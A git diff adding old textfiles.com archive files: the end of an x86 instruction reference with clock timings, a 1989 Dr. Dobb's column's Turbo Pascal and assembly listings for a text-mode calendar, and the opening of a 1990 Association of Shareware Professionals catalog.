reg16,reg16,CL - - 3 3 3 + reg32,reg32,CL - - 3 3 3 + mem16,reg16,CL - - 7 4 5 + mem32,reg32,CL - - 7 4 5 + + + - see ~Instruction Timing~ + +:sldt +^SLDT - Store Local Descriptor Table (286+ privileged) + + + Usage: SLDT dest + Modifies flags: none + + + Stores the Local Descriptor Table (LDT) Register into the + specified operand. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 2 2 2 3 + mem16 - 2 2 3 5 + + + - see ~Instruction Timing~ + +:smsw +^SMSW - Store Machine Status Word (286+ privileged) + + + Usage: SMSW dest + Modifies flags: none + + + Store Machine Status Word (~MSW~) into "dest". + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 2 10 2 3 + mem16 - 3 3 3 5 + + + - see ~Instruction Timing~ + +:stc +^STC - Set Carry + + + Usage: STC + Modifies flags: CF + + + Sets the Carry Flag to 1. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 2 1 + + + - see ~Instruction Timing~ + +:std +^STD - Set Direction Flag + + + Usage: STD + Modifies flags: DF + + + Sets the Direction Flag to 1 causing string instructions to + auto-decrement SI and DI instead of auto-increment. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 2 1 + + + - see ~Instruction Timing~ + +:sti +^STI - Set Interrupt Flag (Enable Interrupts) + + + Usage: STI + Modifies flags: IF + + + Sets the Interrupt Flag to 1, enabling recognition of all CPU + hardware interrupts. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 2 2 2 5 1 + + + - see ~Instruction Timing~ + +:stos:stosb:stosw:stosd +^STOS - Store String (Byte, Word or Doubleword) + + + Usage: STOS dest + STOSB + STOSW + STOSD + Modifies flags: None + + + Stores value in accumulator to location at ES:(E)DI (even if operand + is given). (E)DI is incremented/decremented based on the size of + the operand (or instruction format) and the state of the Direction + Flag. Use with ~REP~ prefixes. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + dest 11 3 4 5 1 (W88=15) + + + - see ~Instruction Timing~ + +:str +^STR - Store Task Register (286+ privileged) + + + Usage: STR dest + Modifies flags: None + + + Stores the current Task Register to the specified operand. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 2 2 2 3 + mem16 - 3 2 3 5 + + + - see ~Instruction Timing~ + +:sub +^SUB - Subtract + + Usage: SUB dest,src + Modifies flags: AF CF OF PF SF ZF + + + The source is subtracted from the destination and the result is + stored in the destination. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 6 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 7 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 17+EA 7 7 3 3-6 (W88=25+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:test +^TEST - Test For Bit Pattern + + Usage: TEST dest,src + Modifies flags: CF OF PF SF ZF (AF undefined) + + + Performs a logical ~AND~ of the two operands updating the flags + register without saving the result. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 1 1 2 + reg,mem 9+EA 6 5 1 2-4 (W88=13+EA) + mem,reg 9+EA 6 5 2 2-4 (W88=13+EA) + reg,immed 5 3 2 1 3-4 + mem,immed 11+EA 6 5 2 3-6 + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ + +:verr +^VERR - Verify Read (286+ protected) + + + Usage: VERR src + Modifies flags: ZF + + + Verifies the specified segment selector is valid and is readable + at the current privilege level. If the segment is readable, + the Zero Flag is set, otherwise it is cleared. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 14 10 11 3 + mem16 - 16 11 11 5 + + + - see ~Instruction Timing~ + +:verw +^VERW - Verify Write (286+ protected) + + + Usage: VERW src + Modifies flags: ZF + + + Verifies the specified segment selector is valid and is ratable + at the current privilege level. If the segment is writable, + the Zero Flag is set, otherwise it is cleared. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg16 - 14 15 11 3 + mem16 - 16 16 11 5 + + + - see ~Instruction Timing~ + +:wait:fwait +^WAIT/FWAIT - Event Wait + + + Usage: WAIT + FWAIT + Modifies flags: None + + + CPU enters wait state until the coprocessor signals it has finished + it's operation. This instruction is used to prevent the CPU from + accessing memory that may be temporarily in use by the coprocessor. + WAIT and FWAIT are identical. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none 4 3 6+ 1-3 1 + + + - see ~Instruction Timing~ + +:wbinvd +^WBINVD - Write-Back and Invalidate Cache + + + Usage: WBINVD + Modifies flags: None + + + Flushes internal cache, then signals the external cache to write + back current data followed by a signal to flush the external cache. + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + none - - - 5 2 + + + - see ~Instruction Timing~ + +:xchg +^XCHG - Exchange + + + Usage: XCHG dest,src + Modifies flags: None + + + Exchanges contents of source and destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 4 3 3 3 2 + mem,reg 17+EA 5 5 5 2-4 (W88=25+EA) + reg,mem 17+EA 5 5 3 2-4 (W88=25+EA) + accum,reg 3 3 3 3 1 + reg,accum 3 3 3 3 1 + + + - see ~Instruction Timing~ + +:xlat:xlatb +^XLAT/XLATB - Translate + + + Usage: XLAT translation-table + XLATB (masm 5.x) + Modifies flags: None + + + Replaces the byte in AL with byte from a user table addressed by + BX. The original value of AL is the index into the translate table. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + table 11 5 5 4 1 + + + - see ~Instruction Timing~ + +:xor +^XOR - Exclusive OR + + Usage: XOR dest,src + Modifies flags: CF OF PF SF ZF (AF undefined) + + + Performs a bitwise exclusive OR of the operands and returns + the result in the destination. + + +% Clocks Size +% Operands 808x 286 386 486 Bytes + + reg,reg 3 2 2 1 2 + mem,reg 16+EA 7 6 3 2-4 (W88=24+EA) + reg,mem 9+EA 7 7 2 2-4 (W88=13+EA) + reg,immed 4 3 2 1 3-4 + mem,immed 17+EA 7 7 3 3-6 (W88=25+EA) + accum,immed 4 3 2 1 2-3 + + + - see ~Instruction Timing~ diff --git a/textfiles.com/computers/asmstr.asc b/textfiles.com/computers/asmstr.asc new file mode 100644 index 00000000..36cd0e0d --- /dev/null +++ b/textfiles.com/computers/asmstr.asc @@ -0,0 +1,618 @@ +_STRUCTURED PROGRAMMING COLUMN_ +by Jeff Duntemann + +[LISTING ONE] + +{ Calendar unit demo program } +{ Jeff Duntemann -- 2/3/89 } + + +PROGRAM CalTest; + + +USES DOS,Crt, { Standard Borland units } + Screens, { Given in DDJ 4/89 } + Calendar; { Given in DDJ 6/89 } + +CONST + YellowOnBlue = $1E; { Text attribute; yellow chars on blue background } + CalX = 25; + CalY = 5; + + +VAR + MyScreen : ScreenPtr; { Type exported by Screens unit } + WorkScreen : Screen; { Type exported by Screens unit } + Ch : Char; + Quit : Boolean; + ShowFor : DateTime; { Type exported by DOS unit } + I : Word; { Dummy; picks up dayofweek field in GetDate } + + +BEGIN + MyScreen := @WorkScreen; { Create a pointer to WorkScreen } + InitScreen(MyScreen,True); + ClrScreen(MyScreen,ClearAtom); { Clear the entire screen } + Quit := False; + + WITH ShowFor DO { Start with clock date } + GetDate(Year,Month,Day,I); + + ShowCalendar(MyScreen,ShowFor,CalX,CalY,YellowOnBlue); + + REPEAT { Until Enter is pressed: } + IF Keypressed THEN { If a keystroke is detected } + BEGIN + Ch := ReadKey; { Pick up the keystroke } + IF Ord(Ch) = 0 THEN { See if it's an extended keystroke } + BEGIN + Ch := ReadKey; { If so, pick up scan code } + CASE Ord(Ch) OF { and parse it } + 72 : Pan(MyScreen,Up,1); { Up arrow } + 80 : Pan(MyScreen,Down,1); { Down arrow } + 75 : BEGIN { Left arrow; "down time" } + WITH ShowFor DO + IF Month = 1 THEN + BEGIN + Month := 12; + Dec(Year) + END + ELSE Dec(Month); + ShowCalendar(MyScreen,ShowFor,CalX,CalY,YellowOnBlue); + END; + 77 : BEGIN { Right arrow; "up time" } + WITH ShowFor DO + IF Month = 12 THEN + BEGIN + Month := 1; + Inc(Year) + END + ELSE Inc(Month); + ShowCalendar(MyScreen,ShowFor,CalX,CalY,YellowOnBlue); + END; + END { CASE } + END + ELSE { If it's an ordinary keystroke, test for quit: } + IF Ch = Chr(13) THEN Quit := True + END; + UNTIL Quit; + ClrScreen(MyScreen,ClearAtom) { All this stuff's exported by Screens } +END. + + +[LISTING TWO] + +{--------------------------------------------------------------} +{ CALENDAR } +{ } +{ Text calendar for virtual screen platform } +{ } +{ by Jeff Duntemann KI6RA } +{ Turbo Pascal 5.0 } +{ Last modified 2/3/89 } +{--------------------------------------------------------------} + +UNIT Calendar; + +INTERFACE + +USES DOS, { Standard Borland unit } + TextInfo, { Given in DDJ 3/89 } + Screens, { Given in DDJ 4/89 } + CalCalc; { Given in DDJ 6/89 courtesy Michael Covington } + +TYPE + DaysOfWeek = (Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday); + Months = (January,February,March,April,May,June,July, + August,September,October,November,December); + + +PROCEDURE ShowCalendar(Target : ScreenPtr; + ShowFor : DateTime; + CalX,CalY : Integer; + Attribute : Byte); + + +IMPLEMENTATION + +TYPE + String10 = STRING[10]; + +CONST + MonthNames : ARRAY[January..December] OF String10 = + ('January','February', 'March','April','May','June','July', + 'August', 'September','October','November','December'); + Days : ARRAY[January..December] OF Integer = + (31,28,31,30,31,30,31,31,30,31,30,31); + +{$L CALBLKS} +{$F+} PROCEDURE CalFrame; EXTERNAL; + PROCEDURE Caldata; EXTERNAL; +{$F-} + +{$L BLKBLAST} +{$F+} +PROCEDURE BlkBlast(ScreenEnd,StoreEnd : Pointer; + ScreenX,ScreenY : Integer; + ULX,ULY : Integer; + Width,Height : Integer; + Attribute : Byte; + DeadLines : Integer; + TopStop : Integer); + EXTERNAL; +{$F-} + + + +FUNCTION IsLeapYear(Year : Integer) : Boolean; + +{ Works from 1901 - 2199 } + +BEGIN + IsLeapYear := False; + IF (Year MOD 4) = 0 THEN IsLeapYear := True +END; + + + + +PROCEDURE FrameCalendar(Target : ScreenPtr; + CalX,CalY : Integer; + Attribute : Byte; + StartDay : DaysOfWeek; + DayCount : Integer); + +TYPE + PointerMath = RECORD + CASE BOOLEAN OF + True : (APointer : Pointer); + False : (OfsWord : Word; + SegWord : Word) + END; + +VAR + DataPtr : Pointer; + FudgeIt : PointerMath; + DayInset : Word; + DayTopStop : Word; + +BEGIN + { DayInset allows is to specify which day of the week the first of the } + { month falls. It's an offset into the block containing day figures } + DayInset := (7-Ord(StartDay))*4; + { DayTopStop allows us to specify how many days to show in the month. } + DayTopStop := 28+(DayCount*4)-DayInset; + BlkBlast(Target,@CalFrame, { Display the calendar frame } + VisibleX,VisibleY, { Genned screen size from TextInfo unit } + CalX,CalY, { Show at specified coordinates } + 29,17, { Size of calendar frame block } + Attribute, { Attribute to use for calendar frame } + 0, { No interspersed empty lines } + 0); { No topstop; show the whole thing. } + + WITH FudgeIt DO { FudgeIt is a free union allowing pointer arithmetic } + BEGIN + APointer := @CalData; { Create the pointer to the days block } + OfsWord := OfsWord+DayInset; { Offset into block for start day } + + BlkBlast(Target,APointer, { Blast the day block over the } + VisibleX,VisibleY, { calendar frame } + CalX+1,CalY+5, { Pos. of days relative to frame } + 28,6, { Size of day block } + Attribute, { Show days in same color as frame } + 1, { Insert 1 line between block lines } + DayTopStop) { Set limit on number of chars to } + END { be copied from block to control } +END; { how many days shown for a month } + + + + +PROCEDURE ShowCalendar(Target : ScreenPtr; + ShowFor : DateTime; + CalX,CalY : Integer; + Attribute : Byte); + +CONST + NameOffset : ARRAY[January..December] OF Integer = + (8,8,10,10,11,10,10,9,7,8,8,8); + +VAR + StartDay : DaysOfWeek; + TargetMonth : Months; + TargetDay : Real; + DaysInMonth : Integer; + +BEGIN + { First figure day number since 1980: } + WITH ShowFor DO TargetDay := DayNumber(Year,Month,1); + { Then use the day number to calculate day-of-the-week: } + StartDay := DaysOfWeek(WeekDay(TargetDay)-1); + TargetMonth := Months(ShowFor.Month-1); + DaysInMonth := Days[TargetMonth]; + { Test and/or adjust for leap year: } + IF TargetMonth = February THEN + IF IsLeapYear(ShowFor.Year) THEN DaysInMonth := 29; + { Now draw the frame on the virtual screen! } + FrameCalendar(Target, + CalX,CalY, + Attribute, + StartDay, + DaysInMonth); + { Add the month name and year atop the frame: } + GotoXY(Target,CalX+NameOffset[TargetMonth],CalY+1); + WriteTo(Target,MonthNames[TargetMonth]+' '+IntStr(ShowFor.Year,4)); +END; + + + +END. + +[LISTING THREE] + +UNIT CalCalc; + +{ --- Calendrics --- } + +{ Long-range calendrical package in standard Pascal } +{ Copyright 1985 Michael A. Covington } + +INTERFACE + +function daynumber(year,month,day:integer):real; + +procedure caldate(date:real; var year,month,day:integer); + +function weekday(date:real):integer; + +function julian(date:real):real; + +IMPLEMENTATION + + +function floor(x:real) : real; + { Largest whole number not greater than x. } + { Uses real data type to accommodate large numbers. } +begin + if (x < 0) and (frac(x) <> 0) then + floor := int(x) - 1.0 + else + floor := int(x) +end; + + + +function daynumber(year,month,day:integer):real; + { Number of days elapsed since 1980 January 0 (1979 December 31). } + { Note that the year should be given as (e.g.) 1985, not just 85. } + { Switches from Julian to Gregorian calendar on Oct. 15, 1582. } +var + y,m: integer; + a,b,d: real; +begin + if year < 0 then y := year + 1 + else y := year; + m := month; + if month < 3 then + begin + m := m + 12; + y := y - 1 + end; + d := floor(365.25*y) + int(30.6001*(m+1)) + day - 723244.0; + if d < -145068.0 then + { Julian calendar } + daynumber := d + else + { Gregorian calendar } + begin + a := floor(y/100.0); + b := 2 - a + floor(a/4.0); + daynumber := d + b + end +end; + +procedure caldate(date:real; var year,month,day:integer); + { Inverse of DAYNUMBER; given date, finds year, month, and day. } + { Uses real arithmetic because numbers are too big for integers. } +var + a,aa,b,c,d,e,z: real; + y: integer; +begin + z := int(date + 2444239.0); + if date < -145078.0 then + { Julian calendar } + a := z + else + { Gregorian calendar } + begin + aa := floor((z-1867216.25)/36524.25); + a := z + 1 + aa - floor(aa/4.0) + end; + b := a + 1524.0; + c := int((b-122.1)/365.25); + d := int(365.25*c); + e := int((b-d)/30.6001); + day := trunc(b - d - int(30.6001*e)); + if e > 13.5 then month := trunc(e - 13.0) + else month := trunc(e - 1.0); + if month > 2 then y := trunc(c - 4716.0) + else y := trunc(c - 4715.0); + if y < 1 then year := y - 1 + else year := y +end; + +function weekday(date:real):integer; + { Given day number as used in the above routines, } + { finds day of week (1 = Sunday, 2 = Monday, etc.). } +var + dd: real; +begin + dd := date; + while dd > 28000.0 do dd:=dd-28000.0; + while dd < 0 do dd:=dd+28000.0; + weekday := ((trunc(dd) + 1) mod 7) + 1 +end; + +function julian(date:real):real; + { Converts result of DAYNUMBER into a Julian date. } +begin + julian := date + 2444238.5 +end; + +END. { CalCalc } + +[LISTING FOUR] + +;=========================================================================== +; +; B L K B L A S T - Blast 2D character pattern and attributes into memory +; +;=========================================================================== +; +; by Jeff Duntemann 3 February 1989 +; +; BLKBLAST is written to be called from Turbo Pascal 5.0 using the EXTERNAL +; machine-code procedure convention. +; +; This version is written to be used with the SCREENS.PAS virtual screens +; unit for Turbo Pascal 5.0. See DDJ for 4/89. +; +; Declare the procedure itself as external using this declaration: +; +; PROCEDURE BlkBlast(ScreenEnd,StoreEnd : Pointer; +; ScreenX,ScreenY : Integer; +; ULX,ULY : Integer; +; Width,Height : Integer; +; Attribute : Byte; +; DeadLines : Integer; +; TopStop : Integer); +; EXTERNAL; +; +; The idea is to store a video pattern as an assembly-language external or +; as a typed constant, and then blast it into memory so that it isn't seen +; to "flow" down from top to bottom, even on 8088 machines. +; +; During the blast itself, the attribute byte passed in the Attribute +; parameter is written to the screen along with the character information +; pointed to by the source pointer. In effect, this means we do a byte-sized +; read from the source character data, but a word-sized write to the screen. +; +; The DeadLines parm specifies how many screen lines to skip between lines of +; the pattern. The skipped lines are not disturbed. TopStop provides a byte +; count that is the maximum number of bytes to blast in from the pattern. +; If a 0 is passed in TopStop, the value is ignored. +; +; To reassemble BLKBLAST: +; +; Assemble this file with MASM or TASM: "C>MASM BLKBLAST;" +; (The semicolon is unnecessary with TASM.) +; +; No need to relink; Turbo Pascal uses the .OBJ only. +; +;======================== +; +; STACK PROTOCOL +; +; This creature puts lots of things on the stack. Study closely: +; + +ONSTACK STRUC +OldBP DW ? ;Caller's BP value saved on the stack +RetAddr DD ? ;Full 32-bit return address. (This is a FAR proc!) +TopStop DW ? ;Maximum number of chars to be copied from block pattern +DeadLns DW ? ;Number of lines of dead space to insert between blasted lines +Attr DW ? ;Attribute to be added to blasted pattern +BHeight DW ? ;Height of block to be blasted to the screen +BWidth DW ? ;Width of block to be blasted to the screen +ULY DW ? ;Y coordinate of upper left corner of the block +ULX DW ? ;X coordinate of the upper left corner of the block +YSize DW ? ;Genned max Y dimension of current visible screen +XSize DW ? ;Genned max X dimension of current visible screen +Block DD ? ;32-bit pointer to block pattern somewhere in memory +Screen DD ? ;32-bit pointer to an array of pointers to screen lines +ENDMRK DB ? ;Dummy field for stack struct size calculation +ONSTACK ENDS + + +CODE SEGMENT PUBLIC + ASSUME CS:CODE + PUBLIC BlkBlast + +BlkBlast PROC FAR + PUSH BP ;Save Turbo Pascal's BP value + MOV BP,SP ;SP becomes new value in BP + PUSH DS ;Save Turbo Pascal's DS value + +;------------------------------------------------------------------------- +; If a zero is passed in TopStop, then we fill the TopStop field in the +; struct with the full size of the block, calculated by multiplying +; BWidth times BHeight. This makes it unnecessary for the caller to +; pass the full size of the block in the TopStop parameter if topstopping +; is not required. +;------------------------------------------------------------------------- + CMP [BP].TopStop,0 ; See if zero was passed in TopStop + JNZ GetPtrs ; If not, skip this operation + MOV AX,[BP].BWidth ; Load block width into AX + MUL [BP].BHeight ; Multiply by block height, to AX + MOV [BP].TopStop,AX ; Put the product back into TopStop + +;------------------------------------------------------------------------- +; The first important task is to get the first pointer in the ShowPtrs +; array into ES:DI. This involved two LES operations: The first to get +; the pointer to ShowPtrs (field Screen in the stack struct) into ES:DI, +; the second to use ES:DI to get the first ShowPtrs pointer into ES:DI. +; Remembering that ShowPtrs is an *array* of pointers, the next task is +; to index DI into the array by multiplying the top line number (ULY) +; less one (because we're one-based) by 4 using SHL and then adding that +; index to DI: +;------------------------------------------------------------------------- +GetPtrs: LES DI,[BP].Screen ; Address of ShowPtrs array in ES:DI + MOV CX,[BP].ULY ; Load line address of block dest. to CX + DEC CX ; Subtract 1 'cause we're one-based + SHL CX,1 ; Multiply CX by 4 by shifting it left... + SHL CX,1 ; ...twice. + ADD DI,CX ; Add the resulting index to DI. + + MOV BX,DI ; Copy offset of ShowPtrs into BX + MOV DX,ES ; Copy segment of ShowPtrs into DX + LES DI,ES:[DI] ; Load first line pointer into ES:DI + +;------------------------------------------------------------------------- +; The inset from the left margin of the block's destination is given in +; struct field ULX. It's one-based, so it has to be decremented by one, +; then multiplied by two using SHL since each character atom is two bytes +; in size. The value in the stack frame is adjusted (it's not a VAR parm, +; so that's safe) and then read from the frame at the start of each line +; blast and added to the line offset in DI. +;------------------------------------------------------------------------- + DEC [BP].ULX ; Subtract 1 'cause we're one-based + SHL [BP].ULX,1 ; Multiply by 2 to cover word moves + ADD DI,[BP].ULX ; And add the adjustment to DI + +;------------------------------------------------------------------------- +; One additional adjustment must be made before we start: The Deadspace +; parm puts 1 or more lines of empty space between each line of the block +; that we're blasting onto the screen. This value is passed in the +; DEADLNS field in the struct. It's passed as the number of lines to skip, +; but we have to multiply it by 4 so that it becomes an index into the +; ShowPtrs array, each element of which is four bytes in size. Like ULX, +; the value is adjusted in the stack frame and added to the stored offset +; value we keep in DX each time we set up the pointer in ES:DI to blast the +; next line. +;------------------------------------------------------------------------- + SHL [BP].DEADLNS,1 ; Shift dead space line count by 1... + SHL [BP].DEADLNS,1 ; ...and again to multiply by 4 + + LDS SI,[BP].Block ; Load pointer to block into DS:SI + +;------------------------------------------------------------------------- +; This is the loop that does the actual block-blasting. Two counters are +; kept, and share CX by being separate values in CH and CL. After +; each line blast, both pointers are adjusted and the counters swapped, +; the LOOP counter decremented and tested, and then the counters swapped +; again. +;------------------------------------------------------------------------- +MovEm: MOV CX,[BP].BWidth ; Load atom counter into CH + MOV AH,BYTE PTR [BP].Attr ; Load attribute into AH +DoChar: LODSB ; Load char from block storage into AL + STOSW ; Store AX into ES:DI; increment DI by 2 + LOOP DoChar ; Go back for next char if CX > 0 + +;------------------------------------------------------------------------- +; Immediately after a line is blasted from block to screen, we adjust. +; First we move the pointer in ES:DI to the next pointer in the +; Turbo Pascal ShowPtrs array. Note that the source pointer does NOT +; need adjusting. After blasting through one line of the source block, +; SI is left pointing at the first character of the next line of the +; source block. Also note the addition of the deadspace adjustment to +; BX *before* BX is copied into DI, so that the adjustment will be +; retained through all the rest of the lines moved. Finally, we subtract +; the number of characters in a line from TopStop, and see if there are +; fewer counts left in TopStop than there are characters in a block line. +; If so, we force BWidth to the number of remaining characters, and +; BHeight to one, so that we will blast only one remaining (short) line. +;------------------------------------------------------------------------- + MOV ES,DX ; Copy ShowPtrs segment from DX into ES + ADD BX,4 ; Bounce BX to next pointer offset + ADD BX,[BP].DeadLns ; Add deadspace adjustment to BX + LES DI,ES:[BX] ; Load next pointer into ES:DI + ADD DI,[BP].ULX ; Add adjustment for X offset into screen + + MOV AX,[BP].TopStop ; Load current TopStop value into AX + SUB AX,[BP].BWidth ; Subtract BWidth from TopSTop value + JBE GoHome ; If TopStop is <= zero, we're done. + MOV [BP].TopStop,AX ; Put TopStop value back in stack struct + CMP AX,[BP].BWidth ; Compare what remains in TopStop to BWidth + JAE MovEm ; If at least one BWidth remains, loop again + MOV [BP].BWidth,AX ; Otherwise, replace BWidth with remainder + JMP MovEm ; and jump to last go-thru + +;------------------------------------------------------------------------- +; When the outer loop is finished, the work is done. Restore registers +; and return to Turbo Pascal. +;------------------------------------------------------------------------- + +GoHome: POP DS ; Restore Turbo Pascal's + MOV SP,BP ; Restore Turbo Pascal's stack pointer... + POP BP ; ...and BP + RET ENDMRK-RETADDR-4 ; Clean up stack and return as FAR proc! + ; (would be ENDMRK-RETADDR-2 for NEAR...) + +BlkBlast ENDP +CODE ENDS + END + + + +[LISTING FIVE] + + + TITLE CalBlks -- External calendar pattern blocks + +; By Jeff Duntemann -- TASM 1.0 -- Last modified 3/1/89 +; +; For use with CALENDAR.PAS and BLKBLAST.ASM as described in DDJ 6/89 + +CODE SEGMENT WORD + ASSUME CS:CODE + + +CalFrame PROC FAR + PUBLIC CalFrame + DB 'ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸' + DB '³ ³' + DB 'ÃÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ´' + DB '³Sun³Mon³Tue³Wed³Thu³Fri³Sat³' + DB 'ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´' + DB '³ ³ ³ ³ ³ ³ ³ ³' + DB 'ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´' + DB '³ ³ ³ ³ ³ ³ ³ ³' + DB 'ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´' + DB '³ ³ ³ ³ ³ ³ ³ ³' + DB 'ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´' + DB '³ ³ ³ ³ ³ ³ ³ ³' + DB 'ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´' + DB '³ ³ ³ ³ ³ ³ ³ ³' + DB 'ÃÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´' + DB '³ ³ ³ ³ ³ ³ ³ ³' + DB 'ÔÍÍÍÏÍÍÍÏÍÍÍÏÍÍÍÏÍÍÍÏÍÍÍÏÍÍ;' +Calframe ENDP + +CalData PROC FAR + PUBLIC CalData + DB ' ³ ³ ³ ³ ³ ³ ³' + DB ' 1³ 2³ 3³ 4³ 5³ 6³ 7³' + DB ' 8³ 9³ 10³ 11³ 12³ 13³ 14³' + DB ' 15³ 16³ 17³ 18³ 19³ 20³ 21³' + DB ' 22³ 23³ 24³ 25³ 26³ 27³ 28³' + DB ' 29³ 30³ 31³ ³ ³ ³ ³' + DB ' ³ ³ ³ ³ ³ ³ ³' + DB ' ³ ³ ³ ³ ³ ³ ³' + +CalData ENDP + + +CODE ENDS + + END + diff --git a/textfiles.com/computers/asp3404.txt b/textfiles.com/computers/asp3404.txt new file mode 100644 index 00000000..75608765 --- /dev/null +++ b/textfiles.com/computers/asp3404.txt @@ -0,0 +1,5894 @@ + + + + + + + + + + + + + + + + + An Official Catalog of Products + + Published by Members of the + + Association of Shareware Professionals + + + + th + 25 Edition + + 4 October 1990 + + + + ÚÄÄÄÄÄÄÄÄÄ¿(tm) + ÚÄÄÄÄÄÁÄÄÄ¿ ³ + Äij ³o ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + ³ ÚÄÄÄÄÄÁÐÄÄ¿ ³ Association of + ³ ³ ÃÄÙ Shareware + ÀÄÄÄ´ o ³ Professionals + ÄÄÄÄÄij º ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + ÀÄÄÄÄÐÄÄÄÄÙ MEMBER + + + + The Association of + Shareware Professionals + P.O. Box #5786 + Bellevue, WA 98006 + + Copyright 1990 by the Association of Shareware + Professionals, All Rights Reserved Worldwide + + + + + + + Contents + + + OFFICIAL ASP CATALOG + FOR BBS USERS 1 + What is the ASP? . . . . . . . . . . . . . . . . . 1 + Tips & Hints . . . . . . . . . . . . . . . . . . . 2 + Accounting . . . . . . . . . . . . . . . . . . . . 3 + Archivers . . . . . . . . . . . . . . . . . . . . 5 + ASP files . . . . . . . . . . . . . . . . . . . . 6 + Astrology & New Age . . . . . . . . . . . . . . . 7 + Astronomy & Geography . . . . . . . . . . . . . . 9 + Backup/restore . . . . . . . . . . . . . . . . . . 10 + BBS software . . . . . . . . . . . . . . . . . . . 10 + Business applications . . . . . . . . . . . . . . 11 + CAD/CAM software . . . . . . . . . . . . . . . . . 16 + Calendars & clocks . . . . . . . . . . . . . . . . 17 + Church & religion . . . . . . . . . . . . . . . . 17 + Command processors . . . . . . . . . . . . . . . . 18 + Communications . . . . . . . . . . . . . . . . . . 19 + Databases . . . . . . . . . . . . . . . . . . . . 22 + Desktop applications . . . . . . . . . . . . . . . 27 + Disk utilities . . . . . . . . . . . . . . . . . . 29 + DOS menus . . . . . . . . . . . . . . . . . . . . 34 + DOS utilities . . . . . . . . . . . . . . . . . . 37 + FAX utilities . . . . . . . . . . . . . . . . . . 43 + File utilities . . . . . . . . . . . . . . . . . . 43 + Finances . . . . . . . . . . . . . . . . . . . . . 45 + Form processing . . . . . . . . . . . . . . . . . 47 + Games & Leisure . . . . . . . . . . . . . . . . . 48 + Graphics . . . . . . . . . . . . . . . . . . . . . 55 + Income taxes . . . . . . . . . . . . . . . . . . . 57 + Keyboard macros . . . . . . . . . . . . . . . . . 58 + Labels & mailing lists . . . . . . . . . . . . . . 58 + Multitaskers . . . . . . . . . . . . . . . . . . . 59 + Music . . . . . . . . . . . . . . . . . . . . . . 59 + Printer utilities . . . . . . . . . . . . . . . . 60 + Programming . . . . . . . . . . . . . . . . . . . 62 + Project management . . . . . . . . . . . . . . . . 69 + Scanner software . . . . . . . . . . . . . . . . . 69 + Soft fonts . . . . . . . . . . . . . . . . . . . . 70 + Statistics . . . . . . . . . . . . . . . . . . . . 71 + Tutorials & Education . . . . . . . . . . . . . . 72 + Word processors . . . . . . . . . . . . . . . . . 73 + + AUTHOR ADDRESSES 78 + + DISK VENDOR ADDRESSES 91 + + PROGRAMS NO LONGER IN ASP 103 + Shareware products . . . . . . . . . . . . . . . 103 + Disk vendors . . . . . . . . . . . . . . . . . . 104 + + Index 105 + + + + + + + _________________________________________________________________ + + OFFICIAL ASP CATALOG + FOR BBS USERS + + 4 October 1990 + + + Copyright 1990 by the Association of Shareware + Professionals, All Rights Reserved Worldwide + + + This document, in printed or electronic form, may be distributed + freely to others by indiviuals, bulletin board systems, national + information systems, and non-profit computer clubs. For-profit + disk vendor companies may distribute this document if they are + currently approved disk vendors of the Association of Shareware + Professionals and if they charge only their normal distribution + fees. All others must obtain prior written permission from the + Association of Shareware Professionals, P.O. Box 5786, Bellevue, + WA 98006. + + + The following programs are published by people and organizations + who are members of the Association of Shareware Professionals. + Many of these programs are available on a local bulletin board + system (BBS) in your area. This catalog may not contain all ASP + products and it may not be current. Comments about the catalog + itself should be sent to the Association of Shareware Profes- + sionals, BBS Catalog Editor, P.O. Box #5786, Bellevue, WA 98006. + If you have a CompuServe account, you can also leave a message in + section 8 of the SHAREWARE forum or send a private message to + userID 70007,4004. + + + What is the ASP? + + The Association of Shareware Professionals (ASP) was formed in + 1987 to strengthen the future of 'shareware' (user-supported + software) as an alternative to software distributed under normal + retail marketing methods. ASP members subscribe to a code of + ethics and are committed to the concept of shareware as a way of + marketing. See page 6 if you'd like to join the ASP or learn + some more about us. + + The ASP itself does NOT rate members' software for functionality + or usefulness. That is for you -- the user -- to decide. Share- + ware software, especially that which is authorized to carry the + ASP logo, can be tested on a try-before-you-buy basis. If the + application doesn't fit your needs, you won't have to worry about + getting a refund. (That's the beauty of the shareware marketing + concept.) + + -- page 2 -- + + + + 'These programs are produced by members of the Asso- + ciation of Shareware Professionals (ASP). ASP wants 